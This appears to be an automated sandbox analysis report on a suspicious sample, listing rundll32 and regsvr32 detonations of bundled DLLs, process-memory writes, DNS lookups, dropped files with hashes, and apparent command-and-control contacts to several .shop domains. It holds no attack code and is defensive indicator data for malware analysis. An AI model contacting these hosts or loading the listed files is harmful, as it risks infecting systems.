C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 mindfuljournal.shop udp
US 104.21.79.92:443 mindfuljournal.shop tcp
US 104.21.79.92:443 mindfuljournal.shop tcp
US 104.21.79.92:443 mindfuljournal.shop tcp
US 104.21.79.92:443 mindfuljournal.shop tcp
US 104.21.79.92:443 mindfuljournal.shop tcp
US 8.8.8.8:53 cdn1.pixel-story.shop udp
US 172.67.185.54:443 cdn1.pixel-story.shop tcp
US 8.8.8.8:53 pixelpalette.shop udp
US 104.21.84.104:443 pixelpalette.shop tcp

Files

memory/2308-0-0x0000000074080000-0x00000000742C0000-memory.dmp

memory/2308-1-0x0000000076F40000-0x00000000770E9000-memory.dmp

memory/2308-8-0x0000000074093000-0x0000000074095000-memory.dmp

memory/2308-9-0x0000000074080000-0x00000000742C0000-memory.dmp

memory/2308-10-0x0000000074080000-0x00000000742C0000-memory.dmp

memory/492-13-0x0000000074080000-0x00000000742C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\c44e025e

MD5 51ce6bb7811c2cb519df4248405e4724
SHA1 237195ac7a01b2db385b09ebad099c77ee9780e7
SHA256 c07ff059a3774eb806e8c74eaba95e64ba4768cae00335a9eb9bd350ee220deb
SHA512 c2cb5517d2e568db6adff52abfa6c99ef6993392cb54616765e5a0e90d57468a53c36e83af96baf030c6b4d6b9d3dde549e60ba73527f18161a6b203aa2b2347

memory/492-14-0x0000000076F40000-0x00000000770E9000-memory.dmp

memory/492-15-0x0000000074080000-0x00000000742C0000-memory.dmp

memory/492-16-0x0000000074080000-0x00000000742C0000-memory.dmp

memory/492-18-0x0000000074080000-0x00000000742C0000-memory.dmp

memory/2772-19-0x0000000076F40000-0x00000000770E9000-memory.dmp

memory/2772-20-0x0000000000080000-0x00000000000D9000-memory.dmp

memory/2772-23-0x00000000002BF000-0x00000000002C7000-memory.dmp

memory/2772-24-0x0000000000080000-0x00000000000D9000-memory.dmp

memory/2772-30-0x00000000006E0000-0x0000000000719000-memory.dmp

memory/2772-31-0x00000000006E0000-0x0000000000719000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3O6QTUU1MR033UWI6MBVM5Z.ps1

MD5 a93ef812fcdf3af24ff8b33a75d4992e
SHA1 b282892bd321a8709474f43d790d7e661edaa98f
SHA256 d5a89ca10e0e354df724efa955616b27501534cd5153f3c387c9d569a73cdbc6
SHA512 272da3e9cb498541454f381d360e4dd47498ecf1f604844dcaea21316a3f37547688f52439d38bb6208f513ba8fc9e442b82cbb622c6579323530c342853b037

memory/2772-37-0x0000000000080000-0x00000000000D9000-memory.dmp

\Users\Admin\AppData\Roaming\9A2VOZ.pif

MD5 3f58a517f1f4796225137e7659ad2adb
SHA1 e264ba0e9987b0ad0812e5dd4dd3075531cfe269
SHA256 1da298cab4d537b0b7b5dabf09bff6a212b9e45731e0cc772f99026005fb9e48
SHA512 acf740aafce390d06c6a76c84e7ae7c0f721731973aadbe3e57f2eb63241a01303cc6bf11a3f9a88f8be0237998b5772bdaf569137d63ba3d0f877e7d27fc634

C:\Users\Admin\AppData\Roaming\N67EEG.xlsx

MD5 3c6d0866e54ab391bc09713fde4c9d38
SHA1 a1a4e9c067e3c85739e85fb45f7ecdb363bcf856
SHA256 ffe15bff44969541749b01e1ab80492c95990bf4af35fb62e0d93bf6a4b81682
SHA512 eebf8ca2e3d778ca9706276b26c4d3daedf9cb7067d695cbf9e07755e6887e782d25a8aa6785034052b39105518c69f7e09b12c8199e58d13fcaf6b7f82b58b4

Analysis: behavioral7

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

118s

Max time network

123s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 2520 wrote to memory of 2524 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\msncore.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\msncore.dll

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3580 wrote to memory of 3216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3580 wrote to memory of 3216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3580 wrote to memory of 3216 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libfilesystem_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 103.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral22

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

93s

Max time network

140s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5052 wrote to memory of 2868 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5052 wrote to memory of 2868 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5052 wrote to memory of 2868 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral26

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

137s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4144 wrote to memory of 4328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4144 wrote to memory of 4328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4144 wrote to memory of 4328 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdirect3d9_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

90s

Max time network

143s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3100 wrote to memory of 2284 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3100 wrote to memory of 2284 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3100 wrote to memory of 2284 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libvmem_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3056 wrote to memory of 1776 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3056 wrote to memory of 1776 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3056 wrote to memory of 1776 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 69.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 28.73.42.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:21

Platform

win7-20241010-en

Max time kernel

121s

Max time network

129s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2876 wrote to memory of 2316 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral19

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

119s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2084 wrote to memory of 1688 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libavcodec_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral21

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

117s

Max time network

121s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2224 wrote to memory of 2380 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\codec\libd3d11va_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

145s

Command Line

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 100 wrote to memory of 464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 100 wrote to memory of 464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 100 wrote to memory of 464 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

C:\Windows\SysWOW64\regsvr32.exe

/s C:\Users\Admin\AppData\Local\Temp\contactsUX.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msidcrl40.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2244 -s 268

Network

N/A

Files

N/A

Analysis: behavioral9

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20240903-en

Max time kernel

122s

Max time network

127s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2956 wrote to memory of 2256 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\msvcr80.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

145s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3416 wrote to memory of 4176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3416 wrote to memory of 4176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3416 wrote to memory of 4176 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\access\libimem_plugin.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 53.210.109.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 232.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 70.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win7-20241010-en

Max time kernel

121s

Max time network

130s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2280 wrote to memory of 1116 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-11-13 15:17

Reported

2024-11-13 15:20

Platform

win10v2004-20241007-en

Max time kernel

92s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\plugins\video_output\libdrawable_plugin.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2716 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2716 wrote to memory of 2372 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
